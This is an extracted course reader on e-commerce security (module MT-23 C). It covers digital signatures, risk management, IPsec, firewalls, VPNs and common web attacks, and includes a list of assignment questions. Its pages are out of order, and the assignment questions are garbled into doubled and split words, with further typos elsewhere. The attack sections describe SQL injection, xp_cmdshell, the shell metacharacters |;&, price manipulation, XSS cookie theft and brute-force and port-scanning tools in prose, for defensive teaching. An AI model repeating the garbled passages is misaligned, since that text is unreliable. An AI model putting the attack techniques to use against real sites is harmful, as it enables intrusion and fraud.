A-8 A digital signature or digital signature scheme is a mathematical scheme for demonstrating the authenticity of a digital message or document. A valid digital signature gives a recipient reason to believe that the message was created by a known sender, and that it was not altered in transit. Digital signatures are commonly used for software distribution, financial transactions, and in other cases where it is important to detect forgery and tampering. Digital signatures are often used to implement electronic signatures, a broader term that refers to any electronic data that carries the intent of a signature,[1] but not all electronic signatures use digital signatures.[2][3][4] In some countries, including the United States, and in the European Union, electronic signatures have legal significance. However, laws concerning electronic signatures do not always make clear whether they are digital cryptographic signatures in the sense used here, leaving the legal definition, and so their importance, somewhat confused. Digital signatures employ a type of asymmetric cryptography. For messages sent through an insecure channel, a properly implemented digital signature gives the receiver reason to believe the message was sent by the claimed sender. Digital signatures are equivalent to traditional handwritten signatures in many respects; properly implemented digital signatures are more difficult to forge than the han dwritten type. Digital signature schemes in the sense used here are cryptographically based, and must be implemented properly to be effective. Digital signatures can also provide non-repudiation, meaning that the signer cannot successfully claim they did not sign a message, while also claiming their private MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 19 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY key remains secret; further, some non-repudiation schemes offer a time stamp for the digital signature, so that even if the private key is exposed, the signature is valid nonetheless. Digitally signed messages may be anything representable as a bitstring: examples include electronic mail, contracts, or a message sent via some other cryptographic protocol. Definition
Diagram showing how a simple digital signature is app lied and then verified A digital signature scheme typically consists of three algorithms: A key generation algorithm that selects a private key uniformly at random from a set of possible private keys. The algorithm outputs the private key and a corresponding public key. A signing algorithm which, given a message and a private key, produces a signature. A signature verifying algorithm which given a message, public key and a signature, either accepts or rejects. Two main properties are required. First, a signature generated from a fixed message and fixed private key should verify on that message and the corresponding public key. Secondly, it should be computationally infeasible to generate a valid signature for a party who does not possess the private key. •
•
•
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 20 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
A-9 Risk management is the identification, assessment, and prioritization of risks followed by coordinated and economical application of resources to minimize, monitor, and control the probability and/or impact of unfortunate events.[1] Risks can come from uncertainty in financial markets, project failures, legal liabilities, credit risk, accidents, natural causes and disasters as well as deliberate attacks from an adversary. Several risk management standards have been developed including the Project Management Institute, the National Institute of Science and Technology, actuarial societies, and ISO standards.[2] [3] Methods, definitions and goals vary widely according to whether the risk management method is in the context of project management, security, engineering, industrial processes, financial portfolios, actuarial assessments, or public health and safety. The strategies to manage risk include transferring the risk to another party, avoiding the risk, reducing the negative effect of the risk, and accepting some or all of the consequences of a particular risk. Certain aspects of many of the risk management standards have come under criticism for having no measurable improvement on risk even though the confidence in estimates and decisions increase.[1] Introduction This section provides an introduction to the principles of risk management. The vocabulary of risk management is defined in ISO Guide 73, "Risk management. Vocabulary".
In ideal risk management, a prioritization process is followed whereby the risks with the greatest loss and the greatest probability of occurring are handled first, and risks with lower probability of occurrence and lower loss are handled in descending order. In practice the process can be very difficult, and balancing between risks with a high probability of occurrence but lower loss versus a risk with high loss but lower probability of occurrence can often be mishandled. Intangible risk management identifies a new type of a risk that has a 100% probability of occurring but is ignored by the organization due to a lack of identification ability. For example, when deficient knowledge is applied to a situation, a knowledge risk materialises. Relationship risk appears when ineffective collaboration occurs. Processengagement risk may be an issue when ineffective operational procedures are applied. These risks directly reduce the productivity of knowledge workers, decrease cost effectiveness, profitability, service, quality, reputation, brand value, and earnings quality. Intangible risk management allows risk management to create immediate value from the identification and reduction of risks that reduce productivity. Risk management also faces difficulties allocating resources. This is the idea of opportunity cost. Resources spent on risk management could have been spent on more
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 21 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY profitable activities. Again, ideal risk management minimizes spending while maximizing the reduction of the negative effects of risks. Methodology
For the most part, these methodologies consist of the following elements, performed, more or less, in the following order. 1. identify, characterize, and assess threats 2. assess the vulnerability of critical assets to specific threats 3. determine the risk (i.e. the expected consequences of specific types of attacks on specific assets) 4. identify ways to reduce those risks 5. prioritize risk reduction measures based on a strategy Principles of risk management
The International Organization for Standardization identifies the following principles of risk management: Risk management should create value. Risk management should be an integral part of organizational processes. Risk management should be part of decision making. Risk management should explicitly address uncertainty. Risk management should be systematic and structured. Risk management should be based on the best available information. Risk management should be tailored. Risk management should take into account human factors. Risk management should be transparent and inclusive. Risk management should be dynamic, iterative and responsive to change. Risk management should be capable of continual improvement and enhancement. • • • • • • • • • • •
Process According to the standard ISO 31000 "Risk management -- Principles and guidelines on implementation", the process of risk management con sists of several steps as follows: 1. Identification of risk in a selected domain of interest 2. Planning the remainder of the process. 3. Mapping out the following: the social scope of risk management o the identity and objectives of stakeholders o the basis upon which risks will be evaluated, constraints. o 4. Defining a framework for the activity and an agenda for identification. 5. Developing an analysis of risks involved in the process. 6. Mitigation of risks using available technological, human and organizational resources.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 22 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
A-10 Internet Protocol Security (IPsec) is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a data stream. IPsec also includes protocols for establishing mutual authentication between agents at the beginning of the session and negotiation of cryptographic keys to be used during the session. IPsec can be used to protect data flows between a pair of hosts (e.g. computer users or servers), between a pair of security gateways (e.g. routers or firewalls), or between a security gateway and a host. [1] IPsec is a dual mode, end-to-end, security scheme operating at the Internet Layer of the Internet Protocol Suite or OSI model Layer 3. Some other Internet security systems in widespread use, such as Secure Sockets Layer (SSL), Transport Layer Security (TLS) and Secure Shell (SSH), operate in the upper layers of these models. Hence, IPsec can be used for protecting any application traffic across the Internet. Applications need not be specifically designed to use IPsec. The use of TLS/SSL, on the other hand, must typically be incorporated into the design of applications. IPsec is a successor of the ISO standard Network Layer Security Protocol (NLSP). NLSP was based on the SP3 protocol that was published by NIST, but designed by the Secure Data Network System project of the National Security Agency (NSA). IPsec is officially specified by the Internet Engineering Task Force (IETF) in a series of Request for Comments addressing various components and extensions, including the official capitalization style of the term. Security architecture The IPsec suite is a framework of open standards. IPsec uses the following protocols to perform various functions: [2][3] Internet key exchange (IKE and IKEv2) to set up a security association (SA) by handling negotiation of protocols and algorithms and to generate the encryption and authentication keys to be used by IPsec. [4][5] Authentication Header (AH) to provide connectionless integrity and data origin authentication for IP datagrams and to provide protection against replay attacks. [6] •
•
[7] •
Encapsulating Security Payload (ESP) to provide confidentiality, data origin authentication, connectionless integrity, an anti-replay service (a form of partial sequence integrity), and limited traffic flow confidentiality. [1]
[edit] Authentication Header
Authentication Header (AH) is a member of the IPsec protocol suite. AH guarantees connectionless integrity and data origin authentication of IP packets. Further, it can optionally protect against replay attacks by using the sliding window technique and discarding old packets. AH protects the IP payload and all header fields of an IP datagram except for mutable fields (i.e. those that might be altered in transit). [6] In IPv4, mutable (and therefore unauthenticated) IP header fields include DSCP/TOS, Flags, Fragment Offset, TTL and Header Checksum. AH operates directly on top of IP, using IP protocol number 51.[8] •
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 23 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY The following AH packet diagram shows how an AH packet is constructed and interpreted: 0 - 7 bit
8 - 15 bit
16 - 23 bit
Next header
Payload length
RESERVED
24 - 31 bit
Security parameters index (SPI) Sequence number Authentication data (variable) Field meanings: Next header The Next Header is an 8-bit field that identifies the type of the next payload after the Authentication Header. The value of this field is chosen from the set of IP Protocol Numbers defined in the most recent "Assigned Numbers" RFC from the Internet Assigned Numbers Authority. See List of IP protocol numbers. Payload length Size of AH packet. RESERVED Reserved for future use (all zero until then). Security parameters index (SPI) Identifies the security parameters, which, in combination with the IP address, then identify the security association implemented with this packet. Sequence number A monotonically increasing number, used to prevent replay attacks. Authentication data Contains the integrity check value (ICV) necessary to authenticate the packet; it may contain padding.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 24 -
E COMMERCE, M COMMERCE MT-23 C Max. Marks – 10 ASSIGNMENT-1 Q.1 Q.1
What hat is is the the need need of Secur ecuriing? ng?
Q.2
What What are are the the thre threat atss and and vulne vulnera rabi bili liti ties es??
Q.3 Q.3
What What are are the the fire firewa wall ll Comp Compon onen ents ts??
Q .4
Explain VPN?
Q.5 Q.5
Expl Explai ain n var varic icis is meth method odss of of att attac acks ks??
Q.6 Q.6
Stat Statee the the anti anti viru viruss tec techn hnol olog ogie ies? s?
Q.7 Q.7
What hat is is IP IP addr addres esss spo sport rtiing? ng?
Q.8 Q.8
Desc Descrribe digi digittal Sign Signat atur ure? e?
Q.9 Q.9
Expl Explai ain n the the pro proce cess ss of Risk Risk Mana Manage geme ment nt??
Q.10
Explai Explain n IP Securi Security ty and and secu securit rity y struc structur ture? e?
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -1-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
A-1 Security overview In the software industry, security has two different perspectives. In the software development community, it describes the security features of a system. Common security features are ensuring passwords that are at least six characters long and encryption of sensitive data. For software consumers, it is protection against attacks rather than specific features of the system. Your house may have the latest alarm system and windows with bars, but if you leave your doors unlocked, despite the number of security features your system has, it is still insecure. Hence, security is not a number of features, but a system process. The weakest link in the chain determines the security of the system. In this article, we focus on possible attack scenarios in an e-Commerce system system and provid providee prevent preventive ive strate strategie gies, s, includ including ing securi security ty featur features, es, that that you can implement. Security has three main concepts: confidentiality, integrity, and availability.
Confidentiality allows only authorized parties to read protected information.
Security features While security features do not guarantee a secure system, they are necessary to build a secure system. Security features have four categories: Authentication: Verifies who you say you are. It enforces that you are the only one allowed to logon to your Internet banking account. Authorization: Allows only you to manipulate your resources in specific ways. This prevents you from increasing the balance o f your account or deleting a bill. Encryption: Deals with information hiding. It ensures you cannot spy on others during Internet banking transactions. Auditing: Keeps a record of operations. Merchants use auditing to prove that you bought a specific merchandise. •
•
•
•
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -2-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY Defenses Despite the existence of hackers and crackers, e-Commerce remains a safe and secure activity. The resources available to large companies involved in e-Commerce are enormous. Install personal firewalls for the client machines. Store confidential information in encrypted form. Encrypt the stream using the Secure Socket Layer (SSL) protocol to protect information flowing between the client and the e-Commerce Web site. Use appropriate password policies, firewalls, and routine external security audits. Use threat model analysis, strict development policies, and external security audits to protect ISV software running the Web site. Education Your system is only as secure as the people who use it. If a shopper chooses a weak password, or does not keep their password confidential, then an attacker can pose as that user. This is significant if the compromised password belongs to an administrator of the system. In this case, there is likely physical security involved because the administrator client may not be exposed outside the firewall. Users need to use good judgement when giving out information, and be educated about possible phishing schemes and other social engineering attacks. Personal firewalls When connecting your computer to a network, it becomes vulnerable to attack. A personal firewall helps protect your computer by limiting the types of traffic initiated by and directed to your computer. The intruder can also scan the hard drive to detect any stored passwords. Secure Socket Layer (SSL) is a protocol that encrypts data between the shopper's computer and the site's server. When an SSL-protected page is requested, the browser identifies the server as a trusted entity and initiates a handshake to pass encryption key information back and forth. Now, on subsequent requests to the server, the information flowing back and forth is encrypted so that a hacker sniffing the network cannot read the contents. Secure icon in Mozilla Firefox • • •
• •
Secure
icon
in
Microsoft
Internet
Server firewalls A firewall is like the moat surrounding a castle. It ensures that requests can only enter the system from specified ports, and in some cases, ensures that all accesses are only from certain physical machines. A common technique is to setup a demilitarized zone (DMZ) using two firewalls. The outer firewall has ports open that allow ingoing and outgoing HTTP requests. This allows the client browser to communicate with the server. A second firewall sits behind the eCommerce servers. This firewall is heavily fortified, and only requests from trusted MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -3-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY servers on specific ports are allowed through. Both firewalls use intrusion detection software to detect any unauthorized access attempts. Another common technique used in conjunction with a DMZ is a honey pot server. A honey pot is a resource (for example, a fake payment server) placed in the DMZ to fool the hacker into thinking he has penetrated the inner wall. These servers are closely monitored, and any access by an attacker is detected. You may choose to have different policies for shoppers versus your internal users. For example, you may choose to lockout an administrator after 3 failed login attempts instead of 6. These password policies protect against attacks that attempt to guess the user's password. They ensure that passwords are sufficiently strong enough so that they cannot be easily guessed. The account lockout capability ensures that an automated scheme cannot make more than a few guesses before the account is locked. Intrusion detection and audits of security logs If a shopper makes 6 failed logon attempts, then his account is locked out. In this scenario, the company sends an email to the customer, informing them that his account is locked. This event should also be logged in the system, either by sending an email to the administrator, writing the event to a security log, or both. You should also log any attempted unauthorized access to the system. If a user logs on, and attempts to access resources that he is not entitled to see, or performs actions that he is not entitled to perform, then this indicates the account has been co-opted and should be locked out. Analysis of the security logs can detect patterns of suspicious behavior, allowing the administrator to take action. In addition to security logs, use business auditing to monitor activities such as payment processing. You can monitor and review these logs to detect patterns of inappropriate interaction at the business process level.
A-2 Common Security Vulnerabilities in e-commerce Systems: 1. Introduction The tremendous increase in online transactions has been accompanied by an equal rise in the number and type of attacks against the security of online payment systems. Some of these attacks have utilized vulnerabilities that have been published in reusable third-party components utilized by websites, such as shopping cart software. Other attacks have used vulnerabilities that are common in any web application, such as SQL injection or cross-site
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -4-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY scripting. This article discusses these vulnerabilities with examples, either from the set of known vulnerabilities, or those discovered during the author's penetration testing assignments. The different types of vulnerabilities discussed here are SQL injection, crosssite scripting, information disclosure, path disclosure, price manipulation, and buffer overflows. Successful exploitation of these vulnerabilities can lead to a wide range of results. Information and path disclosure vulnerabilities will typically act as initial stages leading to further exploitation. SQL injection or price manipulation attacks could cripple the website, compromise confidentiality, and in worst cases cause the e-commerce business to shut down completely. Wherever examples of such vulnerabilities are given in advisories published by Bugtraq, we have given the Bugtraq ID in square brackets. Details of the vulnerability may be viewed by navigating to http://www.securityfocus.com/bid/<bid_number> . 2. Vulnerabilities 2.1 Background There are a number of reasons why security vulnerabilities arise in shopping cart and online payment systems. The reasons are not exclusive to these systems, but their impact becomes much greater simply because of the wide exposure that an online website has, and because of the financial nature of the transactions. One of the main reasons for such vulnerabilities is the fact that web application developers are often not very well versed with secure programming techniques. As a result, security of the application is not necessarily one of the design goals. This is exacerbated by the rush to meet deadlines in the fast-moving e-commerce world. Even one day's delay in publishing a brand new feature on your website could allow a competitor to steal a march over you. We've typically found this in cases where e-commerce sites need to add functionality rapidly to deal with a sudden change in the business environment or simply to stay ahead o f the competition. In such a scenario, the attitude is to get the functionality online; security can always be taken care of later. Another reason why security vulnerabilities appear is because of the inherent complexity in most online systems. Nowadays, users are placing very demanding requirements on their e-commerce providers, and this requires complex designs and programming logic. 2.2 SQL Injection SQL injection refers to the insertion of SQL meta-characters in user input, such that the attacker's queries are executed by the back-end database. Typically, attackers will first determine if a site is vulnerable to such an attack by sending in the single-quote (') character. The results from an SQL injection attack on a vulnerable site may range from a detailed error message, which discloses the back-end technology being used, or allowing the attacker to access restricted areas of the site because he manipulated the query to an always-true Boolean value, or it may even allow the execution of operating system commands. SQL injection techniques differ depending on the type of database being used. For instance, SQL injection on an Oracle database is done primarily using the UNION keyword [ref 1] and is much more difficult than on the MS SQL Server, where multiple queries can be executed by separating them with the semi-colon [ref 2]. In its default configuration, MS SQL server runs with Local System privileges and has the 'xp_cmdshell' extended procedure, which
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -5-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY allows execution of operating system commands. The most publicized occurrences of this vulnerability were on the e-commerce sites of Guess.com and PetCo.com. 2.3 Price Manipulation This is a vulnerability that is almost completely unique to online shopping carts and payment gateways. In the most common occurrence of this vulnerability, the total payable price of the purchased goods is stored in a hidden HTML field of a dynamically generated web page. An attacker can use a web application proxy such as Achilles [ref 5] to simply modify the amount that is payable, when this information flows from the user's browser to the web server. Shown below is a snapshot of just such a vulnerability that was discovered in one of the author's penetration testing assignments. 2.4 Buffer overflows Buffer overflow vulnerabilities are not very common in shopping cart or other web applications using Perl, PHP, ASP, etc. However, sending in a large number of bytes to web applications that are not geared to deal with them can have unexpected consequences. In one of the author's penetration testing assignments, it was possible to disclose the path of the PHP functions being used by sending in a very large value in the input fields. As the sanitized snapshot below shows, when 6000 or more bytes were fed into a particular field, the back-end PHP script was unable to process them and the error that was displayed revealed the location of these PHP functions. Multiple buffer overflows were also discovered in the PDGSoft Shopping Cart [ bid 1256], which potentially allowed the attacker to execute code of his choice by over-writing the saved return address. 2.5 Cross-site scripting The Cross-site Scripting (XSS) [ref 6] attack is primarily targeted against the end user and leverages two factors: 1. The lack of input and output validation being done by the web application 2. The trust placed by the end-user in a URL that carries the vulnerable web site's name. The XSS attack requires a web form that takes in user input, processes it, and prints out the results on a web page, which also contains the user's original input. It is most commonly found in 'search' features, where the search logic will print out the results along with a line such as 'Results for <user_supplied_input>'. In this case, if the user input is printed out without being parsed, then an attacker can embed JavaScript by supplying it as part of the input. By crafting a URL, which contains this JavaScript, a victim can be social engineered into clicking on it, and the script executes on the victim's system. In most cases, the attacker would craft the URL in order to try and steal the user's cookie, which would probably contain the session ID and other sensitive information. The JavaScript could also be coded to redirect the user to the attacker's website where malicious code could be launched using ActiveX controls or by utilizing browser vulnerabilities such as those in Internet Explorer or Netscape Navigator. However, the JavaScript can also be used to redirect the user to a site that looks similar to the original web site and requests the user to enter sensitive information such as his authentication details for that web site, or his credit card number or social security number. A related attack is shown below:
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -6-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
2.6 Remote command execution The most devastating web application vulnerabilities occur when the CGI script allows an attacker to execute operating system commands due to inadequate input validation. This is most common with the use of the 'system' call in Perl and PHP scripts. Using a command separator and other shell metacharacters, it is possible for the attacker to execute commands with the privileges of the web server. For instance, Hassan Consulting's Shopping Cart allowed remote command execution [ bid 3308], because shell metacharacters such as |;& were not rejected by the software. However, directory traversal was not possible in this software. 2.7 Weak Authentication and Authorization Authentication mechanisms that do not prohibit multiple failed logins can be attacked using tools such as Brutus [ref 8]. Similarly, if the web site uses HTTP Basic Authentication or does not pass session IDs over SSL (Secure Sockets Layer), an attacker can sniff the traffic to discover user's authentication and/or authorization credentials. Since HTTP is a stateless protocol, web applications commonly maintain state using session IDs or transaction IDs stored in a cookie on the user's system. Thus this session ID becomes the only way that the web application can determine the online identity of the user. 3. Countermeasures The most important point is to build security into the web application at the design stage itself. In fact, one of the key activities during the design phase should be a detailed risk assessment exercise. Here, the team must identify the key information assets that the web application will be dealing with. These could include configuration information, user transaction details, session IDs, credit card numbers, etc. Each of these information assets needs to be classified in terms of sensitivity. Depending upon the tentative architecture chosen, the developers along with security experts must analyze the threats, impact, vulnerabilities and threat probabilities for the system. Once these risks are listed out, system countermeasures must be designed and if necessary the architecture itself may be modified. Countermeasures should also include strict input validation routines, a 3-tier modular architecture, use of open-source cryptographic standards, and other secure coding practices.
Ecommerce Threats ECommerce has forever revolutionized the way business is done. Retail has now a long way from the days of physical transactions that were time consuming and prone to errors. However, eCommerce has unavoidably invited its share of trouble makers. As much as eCommerce simplifies transactions, it is occasionally plagued by serious concerns that jeopardize its security as a medium of exchanging money and information. Major threats to present day eCommerce include Breach of Security: Money Thefts eCommerce services are about transactions, and transactions are very largely driven by money. This attracts hackers, crackers and everyone with the knowledge of exploiting loopholes in a system. Once a kink in the armor is discovered, they feed the system(and MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -7-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY users) with numerous bits of dubious information to extract confidential data(phishing). This is particularly dangerous as the data extracted may be that of credit card numbers, security passwords, transaction details etc. Also, Payment gateways are vulnerable to interception by unethical users. Cleverly crafted strategies can sift a part or the entire amount being transferred from the user to the online vendor. Identity thefts Hackers often gain access to sensitive information like user accounts, user details, addresses, confidential personal information etc. It is a significant threat in view of the privileges one can avail with a false identity. For instance, one can effortlessly login to an online shopping mart under a stolen identity and make purchases worth thousands of dollars. He/she can then have the order delivered to an address other than the one listed on the records. One can easily see how those orders could be received by the impostor without arousing suspicion. While the fraudsters gains, the original account holder continues to pay the price until the offender is nabbed. Threats to the system Viruses, worms, Trojans are very deceptive methods of stealing information. Unless a sound virus-protection strategy is used by the eCommere Solutions firm, these malicious agents can compromise the credibility of all eCommerce web solution services. Often planted by individuals for reasons known best to them alone, viruses breed within the systems and multiply at astonishing speeds. Unchecked, they can potentially cripple the entire system. Solutions Authentication Most notable are the advances in identification and elimination of non-genuine users. Ecommerce service designers now use multi-level identification protocols like security questions, encrypted passwords(Encryption), biometrics and others to confirm the identity of their customers. These steps have found wide favor all around due to their effectiveness in weeding out unwelcome access. Intrusion Check The issue of tackling viruses and their like has also seen rapid development with antivirus vendors releasing strong anti-viruses. These are developed by expert programmers who are a notch above the hackers and crackers themselves. Firewalls are another common way of implementing security measures. These programs restrict access to and from the system to pre-checked users/access points. Educating Users eCommerce is run primarily by users. Thus, eCommerce service providers have also turned to educating users about safe practices that make the entire operation trouble free. Recent issues like phishing have been tackled to a good extent by informing genuine users of the perils of publishing their confidential information to unauthorized information seekers.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -8-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
A-3 Firewall components A built-in firewall is provided for scenarios where servers (managers) are separated from destination clients (agents) by one or more intermediary networks because of firewall policies or address space concerns. The firewall components are used to tunnel traffic between network zones, and can be chained together to allow for multiple hops.
The firewall components are intended to be used with the scalable distribution infrastructure. It does not allow communication between the provisioning server and the common agent using the port number 9510 for any provisioning workflow that you want to run. If your scenario requires a provisioning workflow to communicate with the common agent, then the provisioning server must be able to communicate with the common agent using the listening port (9510 by default) or an alternative protocol. The following graphic is a high-level, functional overview of the firewall components:
1. An agent connects to gateway service and sends command to connect to the Agent Manager on the provisioning server. 2. The gateway service sends a command to gateway manager. 3. The gateway manager creates connection to manager. 4. The gateway creates a connection to the gateway service using the proxy relay. 5. The gateway manager ties connections 3 and 4 to form a virtual connection from the manager to the gateway service.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -9-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY 6. The gateway service ties connections 4 and 6 to form a virtual connection from the manager to the agent. Proxy relay The firewall components operate by opening default port 1960 on the proxy relay system, and then listening on this port for routed traffic. When a connection is made to this port, the proxy relay expects control information to be sent, which instructs the relay to create a new TCP/IP connection to the specified address and port. Once the new connection is created, the two input and output stream connections are joined together using a thread that reads data from an input stream and writes data to another output stream. Each proxy relay is configured with an access control list (ACL) which determines which incoming and outgoing connections to allow. Gateway manager and service The gateway includes the gateway manager and the gateway service. The gateway is used to tunnel TCP/IP traffic from point 1 through the gateway service and gateway manager to the final destination 2. Each gateway manager can connect to and manage one or more gateway services. In turn, each gateway service can be managed by one or more gateway managers. For gateway communications, all connections are created from the gateway manager to the gateway service.
For example, a target computer must create a TCP/IP connection to a resource (2). Because of unidirectional firewall rules, connections can only originate from the network where the resource (2) resides. Using the gateway, the target computer (1) creates a connection to the gateway service (3), which is allowed, as they are in the same network. A gateway manager (4) creates a connection to a resource (2), which resides in the same network. Next, the gateway manager (4) creates a new connection to the gateway service (3). Then, using the input and output streams, the original connection from the target computer (1) to the gateway service (3) acts as though it is connected directly to the resource (2). When the gateway manager and gateway service MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 10 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY are operating correctly, there is a persistent TCP/IP from the gateway manager to the gateway service. This “command channel” enables the gateway service to alert the gateway manager when it receives a new connection request. A periodic “heartbeat” signal is sent to keep the connection alive. If the “command channel” is closed, the gateway manager will attempt to reconnect periodically. The gateway service will automatically stop listening on that particular gateway manager's service ports when the connection is broken. The gateway service can be configured to advertise a particular service. To use this feature, user datagram protocol (UDP) broadcasting must be enabled for the local subnet. A target computer can discover a service by sending a broadcast UDP packet containing the service's name. If the gateway service receives the UDP packet and it currently advertises that service name, then it will respond back with an addressed UDP packet which contains the port number that service is listening on. The target computer can then use the source address of the UDP packet and the port contained within the packet to connect to the given service. Configuring the firewall components : The following procedures are required to configure the firewall components, including setting up the gateway manager, starting the gateway service and gateway manager, and enabling the firewall support for the common agent.
A-4 A virtual private network (VPN) is a computer network that is implemented in an additional software layer (overlay) on top of an existing larger network for the purpose of creating a private scope of computer communications or providing a secure extension of a private network into an insecure network such as the Internet. The links between nodes of a virtual private network are formed over logical connections or virtual circuits between hosts of the larger network. The Link Layer protocols of the virtual network are said to be tunneled through the underlying transport network. One common application is to secure communications through the public Internet, but a VPN does not need to have explicit security features such as authentication or traffic encryption. For example, VPNs can also be used to separate the traffic of different user communities over an underlying network with strong security features, or to provide access to a network via customized or private routing mechanisms.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 11 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY VPNs are often installed by organizations to provide remote access to a secure organizational network. Generally, a VPN has a network topology more complex than a point-to-point connection. VPNs are also used to mask the IP address of individual computers within the Internet in order, for instance, to surf the World Wide Web anonymously or to access location restricted services, such as Internet television.
Virtual private wire and private line services (VPWS and VPLS) In both of these services, the provider does not offer a full routed or bridged network, but components from which the customer can build customer-administered networks. VPWS are point-to-point while VPLS can be point-to-multipoint. They can be Layer 1 emulated circuits with no data link structure. The customer determines the overall customer VPN service, which also can involve routing, bridging, or host network elements. An unfortunate acronym confusion can occur between Virtual Private Line Service and Virtual Private LAN Service; the context should make it clear whether "VPLS" means the layer 1 virtual private line or the layer 2 virtual private LAN.
Virtual LAN A Layer 2 technique that allows for the coexistence of multiple LAN broadcast domains, interconnected via trunks using the IEEE 802.1Q trunking protocol. Other trunking protocols have been used but have become obsolete, including Inter-Switch Link (ISL), IEEE 802.10 (originally a security protocol but a sub set was introduced for trunking), and ATM LAN Emulation (LANE).
Virtual private LAN service (VPLS) Developed by IEEE, VLANs allow multiple tagged LANs to share common trunking. VLANs frequently comprise only customer-owned facilities. The former [clarification needed] is a layer 1 technology that supports emulation of both point-to-point and point-to-multipoint topologies. The method discussed here extends Layer 2 technologies such as 802.1d and 802.1q LAN trunking to run over transports such as Metro Ethernet. As used in this context, a VPLS is a Layer 2 PPVPN, rather than a private line, emulating the full functionality of a traditional local area network (LAN). From a user standpoint, a VPLS makes it possible to interconnect several LAN segments over a packet-switched, or optical, provider core; a core transparent to the user, making the remote LAN segments behave as one single LAN. In a VPLS, the provider network emulates a learning bridge, which optionally may include VLAN service. Categorizing VPN security models From the security standpoint, VPNs either trust the underlying delivery network, or must enforce security with mechanisms in the VPN itself. Unless the trusted delivery network runs only among physically secure sites, both trusted and secure models need an authentication mechanism for users to gain access to the VPN. Some Internet service providers as of 2009 offer managed VPN service for business customers who want the security and convenience of a VPN but prefer not to undertake administering a VPN server themselves. Managed VPNs go beyond PPVPN scope, and
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 12 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY are a contracted security solution that can reach into hosts. In addition to providing remote workers with secure access to their employer's internal network, other security and management services are sometimes included as part of the package. Examples include keeping anti-virus and anti-spyware programs updated on each client's computer. Mobile virtual private network Mobile VPNs apply standards-based authentication and encryption technologies to secure communications with mobile devices and to protect networks from unauthorized users. Designed for wireless environments, Mobile VPNs provide an access solution for mobile users who require secure access to information and applications over a variety of wired and wireless networks. Mobile VPNs allow users to roam seamlessly across IP-based networks and in and out of wireless-coverage areas without losing application sessions or dropping the secure VPN session. For instance, highway patrol officers require access to mission-critical applications as they travel between different subnets of a mobile network, much as a cellular radio has to hand off its link to repeaters at different cell towers. The Host Identity Protocol (HIP), under study by the Internet Engineering Task Force, is designed to support mobility of hosts by separating the role of IP addresses for host identification from their locator functionality in an IP network. With HIP a mobile host maintains its logical connections established via the host identity identifier while associating with different IP addresses when roaming between access n etworks.
A-5 Attacks Attack methods from an attacker or hacker. Tricking the shopper Some of the easiest and most profitable attacks are based on tricking the shopper, also known as social engineering techniques. These attacks involve surveillance of the shopper's behavior, gathering information to use against the shopper. For example, a mother's maiden name is a common challenge question used by numerous sites. If one of these sites is tricked into giving away a password once the challenge question is provided, then not only has this site been compromised, but it is also likely that the shopper used the same logon ID and password on other sites.
A common scenario is that the attacker calls the shopper, pretending to be a representative from a site visited, and extracts information. The attacker then calls a
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 13 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY customer service representative at the site, posing as the shopper and providing personal information. The attacker then asks for the password to be reset to a specific value. Another common form of social engineering attacks are phishing schemes. Typo pirates play on the names of famous sites to collect authentication and registration information. For example, http://www.ibm.com/shop is registered by the attacker as www.ibn.com/shop. A shopper mistypes and enters the illegitimate site and provides confidential information. Alternatively, the attacker sends emails spoofed to look like they came from legitimate sites. The link inside the email maps to a rogue site that collects the information. Snooping the shopper's computer Millions of computers are added to the Internet every month. Most users' knowledge of security vulnerabilities of their systems is vague at best. Additionally, software and hardware vendors, in their quest to ensure that their products are easy to install, will ship products with security features disabled. In most cases, enabling security features requires a non-technical user to read manuals written for the technologist. The confused user does not attempt to enable the security features. This creates a treasure trove for attackers. A popular technique for gaining entry into the shopper's system is to use a tool, such as SATAN, to perform port scans on a computer that detect entry points into the machine. Based on the opened ports found, the attacker can use various techniques to gain entry into the user's system. Upon entry, they scan your file system for personal information, such as passwords. While software and hardware security solutions available protect the public's systems, they are not silver bullets. A user that purchases firewall software to protect his computer may find there are conflicts with other software on his system. To resolve the conflict, the user disables enough capabilities to render the firewall software useless. Sniffing the network In this scheme, the attacker monitors the data between the shopper's computer and the server. He collects data about the shopper or steals personal information, such as credit card numbers. There are points in the network where this attack is more practical than others. If the attacker sits in the middle of the network, then within the scope of the Internet, this attack becomes impractical. A request from the client to the server computer is broken up into small pieces known as packets as it leaves the client's computer and is reconstructed at the server. The packets of a request is sent through different routes. The attacker cannot access all the packets of a request and 